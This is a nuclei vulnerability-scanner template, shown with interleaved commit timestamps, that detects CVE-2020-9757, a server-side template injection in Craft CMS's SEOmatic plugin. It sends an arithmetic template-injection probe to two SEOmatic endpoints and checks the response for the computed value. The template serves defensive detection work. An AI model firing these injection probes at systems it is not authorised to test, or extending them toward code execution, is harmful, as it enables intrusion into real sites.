nuclei-templates/http/cves/2020/CVE-2020-9757.yaml

53 lines
1.8 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-9757
info:
name: Craft CMS < 3.3.0 - Server-Side Template Injection
author: dwisiswant0
severity: critical
description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.
reference:
- https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
- https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt
- https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
- https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
- https://nvd.nist.gov/vuln/detail/CVE-2020-9757
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9757
cwe-id: CWE-74
2023-10-14 11:27:55 +00:00
epss-score: 0.96999
epss-percentile: 0.99646
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: craftcms
product: craft_cms
tags: cve,cve2020,ssti
http:
- method: GET
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
2021-10-06 23:53:20 +00:00
skip-variables-check: true
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
words:
- "MetaLinkContainer"
- "canonical"
- "22344"
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100880d469f708dcd2b4cd99df0f3fea85d1049bbd99e8b5cacbe1d8d2d1fab1053022100fae1a0315ed1ace79c5720ee10844a9ee3aa0f4e55d128a9225e256d893687b2:922c64590222798bb761d5b6d8e72950